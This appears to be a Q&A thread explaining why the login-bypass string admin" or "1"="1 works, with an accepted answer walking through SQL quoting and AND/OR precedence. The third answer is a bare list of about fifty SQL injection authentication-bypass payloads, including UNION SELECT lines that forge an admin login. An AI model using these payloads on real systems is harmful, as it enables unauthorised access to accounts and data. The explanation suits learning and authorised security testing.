# What is the meaning of admin" or "1"="1?

Tags: php, sql, security, sql-injection

I ran `admin" or "1"="1` on a site i've got full permissions to run SQL injection on. The site was mis-configured and let me log straight on.

What i'm not understanding, is why there is no need for a double quote after the final number 1?

If the php is working like this: `username="admin" and password=md5("password")`, then the quote after admin" closes the first quote.

```
"1" is closed, but I don't understand "1
```

Can anyone explain this for me?

Thanks in advance

Answer (score 3, accepted):

Think about what the SQL query in the application might be.

Probably something like `select * from users where username="<<username>>" and password=md5("<<password>>")` as you noted.

After injecting `<<username>>` and `<<password>>`, you still need to have a valid SQL query, otherwise the application will fail with an error.

Using `<<username>>` for the injection, the quote after `admin` closes the username string, `or "1"="1` makes the query like:

`select * from users where username="admin" or "1"="1" and password=md5("<<password>>")`

This is valid, and as `and` is higher precedence than `or`, it gets a user with the name "admin" OR one that has the password you entered in the other field - doesn't matter.

If you had a quote at the end of the injected string, the query would be `select * from users where username="admin" or "1"="1"" and password=md5("<<password>>")`, which is invalid SQL because of the two quotes (easily seen because the number of quotes is odd).

Answer (score 0):

Double quotes after final 1 will be closed by the SQL query in the application.

Answer (score 0):

SQL INJECTION PATTERNS
or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Hope this helps

Comment: Hello! While this code may solve the question, [including an explanation](https://meta.stackexchange.com/q/114762) of how and why this solves the problem would really help to improve the quality of your post, and probably result in more up-votes. Remember that you are answering the question for readers in the future, not just the person asking now. Please [edit] your answer to add explanations and give an indication of what limitations and assumptions apply.

Comment: I would also recommend formatting your code to make it easier to read